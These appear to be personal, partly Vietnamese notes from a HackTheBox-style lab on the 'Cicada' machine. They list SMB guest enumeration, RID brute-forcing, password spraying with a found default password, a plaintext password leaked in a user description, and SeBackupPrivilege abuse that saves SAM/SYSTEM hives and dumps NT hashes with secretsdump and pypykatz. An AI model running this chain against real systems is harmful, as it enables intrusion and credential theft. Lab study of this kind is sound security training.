Skip to main content

Cicada

cnmap target expose target port

Ennumerate user

crackmapexec smb cicada.htb -u 'guest' -p '' --shares

smbclient -N //$target/HR

nxc smb cicada.htb -u 'guest' -p '' --rid-brute

Cut username

cat file.txt | cut -d'\' -f2 | cut -d' ' -f1

crackmapexec smb 10.10.11.35 -u '' -p '' --users | \ awk -F'\\\\' '{split($2,a," "); print a[1]}'

Spray password

netexec smb cicada.htb -u userlist.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

Tìm xem có user mới không

netexec smb cicada.htb -u userlist.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

Wow khi chạy cái này thì có description, của user david ta có Just in case I forget my password is aRt$Lp#7t*VQ!3 david.orelious

2 cách để leo quyền admin

https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/SeBackupPrivilege.md

*Evil-WinRM* PS C:\temp> reg save hklm\sam c:\temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\temp> dir


    Directory: C:\temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/29/2025   3:07 PM          49152 sam
-a----        11/29/2025   2:56 PM          49152 sam.hive
-a----        11/29/2025   2:56 PM       18518016 system.hive


*Evil-WinRM* PS C:\temp> reg save hklm\system c:\temp\system
The operation completed successfully.

download sam download system pypykatz registry --sam sam system

ika@learning:~/Downloads/cicada$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
lika@learning:~/Downloads/cicada$ pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

nxc smb $tảget -u 'guest' -p '' --shares --spider HR --regex